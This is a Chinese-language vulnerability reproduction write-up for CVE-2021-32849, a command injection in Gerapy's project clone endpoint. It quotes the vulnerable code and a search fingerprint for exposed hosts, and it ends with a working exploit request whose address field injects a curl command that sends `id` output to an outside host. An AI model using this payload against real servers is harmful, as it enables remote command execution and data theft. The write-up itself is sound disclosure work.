Gerapy clone 后台远程命令执行漏洞 CVE-2021-32849¶

漏洞描述¶

近日，我司应急团队监测到关于Gerapy 0.9.6和之前的版本中存在注入漏洞，漏洞编号：CVE-2021-32849，该漏洞源于程序没有正确清理通过project_clone端点传递给Popen的输入，攻击者可利用该漏洞执行任意命令。

漏洞影响¶

Gerapy <= 0.9.6

网络测绘¶

title="Gerapy"

漏洞复现¶

登录页面

出现漏洞的文件为 gerapy/server/core/views.py

@api_view(['POST'])
@permission_classes([IsAuthenticated])
def project_clone(request):
    """
    clone project from github
    :param request: request object
    :return: json
    """
    if request.method == 'POST':
        data = json.loads(request.body)
        address = data.get('address')
        if not address.startswith('http'):
            return JsonResponse({'status': False})
        address = address + '.git' if not address.endswith('.git') else address
        cmd = 'git clone {address} {target}'.format(address=address, target=join(PROJECTS_FOLDER, Path(address).stem))
        logger.debug('clone cmd %s', mcd)
        p = Popen(cmd, shell=True, stdin=PIPE, stdout=PIPE, stderr=PIPE)
        stdout, stderr = bytes2str(p.stdout.read()), bytes2str(p.stderr.read())
        logger.debug('clone run result %s', stdout)
        if stderr: logger.error(stderr)
        return JsonResponse({'status': True}) if not stderr else JsonResponse({'status': False})

这里可以看到 address参数为可控参数，拼接到 cmd中使用 Popen命令执行，构造请求包

POST /api/project/clone HTTP/1.1
Host: 
Content-Length: 61
Accept: application/json, text/plain, */*
Authorization: Token 0fb31a60728efd8e6398349bea36fa7629bd8df0
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36
Content-Type: application/json;charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6
Connection: close

{"address":"http://127.0.0.1;curl xxx.xxx.xxx.xxx:9999?`id`"}